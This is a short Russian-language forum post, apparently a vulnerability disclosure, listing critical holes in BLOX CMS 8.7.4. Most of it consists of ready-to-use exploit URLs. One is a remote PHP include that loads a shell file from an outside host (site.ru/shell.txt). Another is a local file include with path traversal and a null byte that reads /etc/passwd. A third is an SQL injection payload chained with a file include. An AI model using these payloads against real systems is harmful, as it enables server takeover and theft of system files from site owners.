Офф. сайт: Blox.ru | Информация о CMS Текущая версия: 8.7.4 настолько дырявая, что на раскрутку всех багов уйдет вечность Поэтому я ограничелся несколькими критическими уязвимостями =) [PHP-Include REMOTE] BLOX\functions\go.php[8] register_globals=ON Code: http://blox/BLOX/go.php?dbhost=localhost&dbuser=root&dbpass=&dbname=blox&prefix=1&bloxDir=http://site.ru/shell.txt? [PHP-Include LOCAL] BLOX\functions\go.php[18], BLOX\functions\getPageParams.php[3] register_globals=ON Code: http://blox/?cmsLanguage=russian/../../../../etc/passwd%00 POC [PHP-Include with SQL Injection] BLOX\functions\go.php[29, 119-142] Ошибка в синтаксисе SQL запроса в скрипте, пока косяк в коде не поправят - работать не будет. Code: http://blox/?PQ=1&1'UNION(SELECT(1),2,CONCAT('../../../../../../../../../../ect/passwd',0x00))/* Скачать исходник: http://blox.ru/?download&file=BLOX.8.7.4.zip
